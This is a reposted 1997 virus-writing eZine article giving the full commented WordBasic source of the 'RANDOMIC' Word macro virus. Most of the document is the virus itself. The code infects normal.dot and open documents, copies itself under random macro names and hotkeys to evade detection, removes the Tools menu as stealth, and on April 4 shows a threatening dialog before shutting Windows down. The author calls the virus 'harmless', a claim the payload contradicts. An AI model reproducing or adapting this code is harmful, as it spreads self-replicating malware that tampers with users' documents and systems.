Copy Link
Add to Bookmark
Report

SLAM2.008: WordMacro Virus Randomic by NJ [SLAM]

eZine's profile picture
Published in 
Slam
 · 2 years ago

[ WordMacro. RANDOMIC ]-------------- 

˛ VIRUSNAME: RANDOMIC
˛ SIZE: 3497 Bytes
˛ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker

->Polymorf Yes
->Stealth Yes
->Encrypted No
->Retro No
--------------------------------------


It's a new semi-polymorphic macro virus, which don't need ini files to get the macro names. The virus uses at every infection different keyboard keys.

OK, here is the source code of this harmless macro virus:

----------------------------------------------------------------------------- 

Sub MAIN
On Error Goto Finish 'Error Handler
A$ = FileName$() : If A$ = "" Then Goto Finish 'if there isn't a
'active file go to F.
B$ = LCase$(Right$(MacroFileName$(MacroName$(0)), 10)) 'where is the macro?
If B$ = "normal.dot" Then 'normal.dot then,
If VInstDoc = 0 Then 'if the active file
'isn't infected
VInfectDoc 'call VInfectDoc and
FileSaveAll 1, 1 'save all.
End If
w$ = Noini$(b$) : Q$ = MacroDesc$(w$) 'Get and insert the
Qw$ = Right$(q$, 1) : Insert Qw$ 'pressed key.
Else 'Or if the macro is in
'the active file,
Key$ = GetDocumentVar$("TKey") : Insert Key$ 'get and insert the
'pressed key, too. :)
If VInstNormal = 0 Then 'If normal.dot isn't
VInfectNormal 'infected, do it!
End If
End If
Finish: 'Label Finish
Randomic 'Call Payload
End Sub 'end.

Sub VInfectDoc 'Code to infect active
'file starts here.
'Get the macro name and
'generate a new key.
CO$ = Noini$(b$) : gf$ = GetNewTas$(lo$, li$) : gd$ = Left$(gf$, 1)
'Get the character and
'the ansi code of it.
'Save the macro descri-
'ption of the active m.
ge$ = Right$(gf$, 2) : gh = Val(ge$) : go$ = MacroDesc$(CO$) '<-------------|
'and insert the new
'description.
ToolsMacro .Name = CO$, .Description = "RANDOMIC+" + gd$, .SetDesc
'Generate now a new
v = 1 : S$ = Fun$(u$) : FileSaveAs .Format = v 'macro name. (Fun$())
MacroCopy "Global:" + CO$, FileName$() + ":" + S$ 'Copy the macro.
ToolsMacro .Name = CO$, .Description = go$, .SetDesc 'Change the macro
'description again.
SetDocumentVar "RANDOMIC", S$ 'Save the macro name
SetDocumentVar "TKey", gd$ 'and the key. Link the
'new key to the macro.
ToolsCustomizeKeyboard .KeyCode = gh, .Category = 2, .Name = S$, .Add, .Context = 1
End Sub

Sub VInfectNormal 'And now the code to
'infect normal.dot.
Z$ = Fun$(u$) : PO$ = GetDocumentVar$("RANDOMIC") 'Generate a new macro
'name and get the name
'of this active macro.
CO$ = FileName$() + ":" + PO$ : MacroCopy CO$, "Global:" + Z$ 'copy it!
gf$ = GetNewTas$(lo$, li$) : gd$ = Left$(gf$, 1) 'Generate a new key.
ge$ = Right$(gf$, 2) : gh = Val(ge$) 'character + ansi code
'Link it to the macro
ToolsCustomizeKeyboard .KeyCode = gh, .Category = 2, .Name = Z$, .Add, .Context = 0 : a$ = "RANDOMIC+" + gd$
'Save the character in
'the macro description.
ToolsMacro .Name = Z$, .Show = 1, .Description = a$, .SetDesc
'And now the stealth
l$ = MenuText$(0, 6, 0) 'routine: l$ is now
'"Tools". (in the
'english version
'of Word)
ToolsCustomizeMenuBar .Context = 0, .MenuType = 0, .Menu = l$, .Remove
'Delete now the
'complete Tools Option!
End Sub 'end.

Function VInstNormal
RA$ = Noini$(b$) 'Get the macro name.
VInstNormal = 0 'Set VInstNormal to 0
If CountMacros(0) > 0 Then 'If there any macros,
For i = 1 To CountMacros(0) 'count all and search
If MacroName$(i, 0) = RA$ Then 'now the virus macro.
VInstNormal = 1 'present, then V.. = 1
End If
Next i
End If
End Function

Function VInstDoc
On Error Resume Next 'Error Handler
IC$ = GetDocumentVar$("RANDOMIC") 'Get the macro name
VInstDoc = 0 'Set VInstDoc to 0
If CountMacros(1) > 0 Then 'If there any macros,
For i = 1 To CountMacros(1) 'count all and search
If MacroName$(i, 1) = IC$ Then 'the virus macro.
VInstDoc = 1 'present,then V.. = 1
End If
Next i
End If
End Function


Function Fun$(u$) 'Function to make a
'new macro name.
'a = a new random number, translate "a" into a string and you have b$.
'Get the last characters of b$ (= c$) and generate a new random number (di).

a = Rnd() : b$ = Str$(a) : c$ = Right$(b$, 2) : di = Rnd()

'Translate "di" into a string (dj$) and get again the last two characters.
'At last translate it back into a integer (x).

dj$ = Str$(di) : d$ = Right$(dj$, 2) : x = Val(d$)

'Translate c$ into a integer. z = x * y (e.g. z = 45 * 76)
'Translate this number into a string (e$) and remove the space.

y = Val(c$) : z = x * y : e$ = Str$(z) : e$ = LTrim$(e$)

'Generate a new random number (f), translate it into a string (g$),
'get the last character (h$) and remove the space (h$).

f = Rnd() : g$ = Str$(f) : h$ = Right$(g$, 1) : h$ = RTrim$(h$)

'Translate the string h$ into a integer (i).

i = Val(h$)
If i = 0 Then 'if i = 0 then
j$ = "A" 'j$ = A
ElseIf i = 1 Then 'and ....
j$ = "B"
ElseIf i = 2 Then
j$ = "C"
ElseIf i = 3 Then
j$ = "D"
ElseIf i = 4 Then
j$ = "E"
ElseIf i = 5 Then
j$ = "F"
ElseIf i = 6 Then
j$ = "G"
ElseIf i = 7 Then
j$ = "H"
ElseIf i = 8 Then
j$ = "I"
ElseIf i = 9 Then
j$ = "J"
End If
u$ = j$ + e$ : Fun$ = u$ 'Add the charater to
'the number and you
'have a new name.
End Function 'end.


Function Noini$(b$) 'Function to get the
c = 1 'macro name.
Again: 'Label "Again"
On Error Goto venito : b$ = KeyMacro$(c, 0) 'Error Handler and b$
'is the active macro.
d$ = MacroDesc$(b$) : d$ = Left$(d$, 8) 'Get the macro descri-
'ption (d$) and the
'first 8 character of it
If d$ = "RANDOMIC" Then 'If it's "RANDOMIC"
Noini$ = b$ 'then that's our MACRO!
Else 'or
c = c + 1 : Goto Again 'search again.
End If
venito:
End Function 'end.

Function GetNewTas$(lo$, li$) 'Function to get a new
NewRandom: 'key.
KI = Rnd() : KJ$ = Str$(KI) : KK$ = Right$(KJ$, 2) : KK$ = LTrim$(KK$)
K = Val(KK$) : If K< 65 Or K > 90 Then Goto NewRandom 'Generate a number
'between 65 and 90.
If k = 65 Then 'If k = 65 then
lo$ = "a" 'lo$ = "a"
ElseIf k = 66 Then 'and ....
lo$ = "b"
ElseIf k = 67 Then
lo$ = "c"
ElseIf k = 68 Then
lo$ = "d"
ElseIf k = 69 Then
lo$ = "e"
ElseIf k = 70 Then
lo$ = "f"
ElseIf k = 71 Then
lo$ = "g"
ElseIf k = 72 Then
lo$ = "h"
ElseIf k = 73 Then
lo$ = "i"
ElseIf k = 74 Then
lo$ = "j"
ElseIf k = 75 Then
lo$ = "k"
ElseIf k = 76 Then
lo$ = "l"
ElseIf k = 77 Then
lo$ = "m"
ElseIf k = 78 Then
lo$ = "n"
ElseIf k = 79 Then
lo$ = "o"
ElseIf k = 80 Then
lo$ = "p"
ElseIf k = 81 Then
lo$ = "q"
ElseIf k = 82 Then
lo$ = "r"
ElseIf k = 83 Then
lo$ = "s"
ElseIf k = 84 Then
lo$ = "t"
ElseIf k = 85 Then
lo$ = "u"
ElseIf k = 86 Then
lo$ = "v"
ElseIf k = 87 Then
lo$ = "w"
ElseIf k = 88 Then
lo$ = "x"
ElseIf k = 89 Then
lo$ = "y"
ElseIf k = 90 Then
lo$ = "z"
End If
li$ = Str$(k) : GetNewTas$ = lo$ + li$ 'GetNewTas$ is now the
'new character (lo$)
'and the ansi code (li$)
End Function 'end.

Sub Randomic 'Payload
If Month(Now()) = 4 And Day(Now()) = 4 Then
Begin Dialog UserDialog 532, 238, ">> RANDOMIC << STRANGE LUCK >> RANDOMIC <<"
Text 44, 8, 431, 13, "______________________________________________", .Text1
Text 44, 91, 431, 13, "______________________________________________", .Text5
Text 44, 132, 431, 13, "______________________________________________", .Text7
Text 164, 29, 181, 13, "Your system is infected ", .Text2
Text 80, 75, 361, 13, "Immediately stop your work, or you will regret it.", .Text3
Text 127, 52, 252, 13, "with the RANDOMIC macro virus.", .Text4
Text 122, 114, 248, 13, "That's maybe your last chance!!!", .Text6
Text 157, 157, 184, 13, "Nightmare Joker [SLAM]", .Text8
Text 227, 184, 39, 13, "1997", .Text9
OKButton 203, 208, 88, 21
End Dialog
Dim dlg As UserDialog
d = Dialog(dlg) 'Show the Message Box
ExitWindows 'and close Windows.
End If
End Sub 'end.

-----------------------------------------------------------------------------


Nightmare Joker [SLAM]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT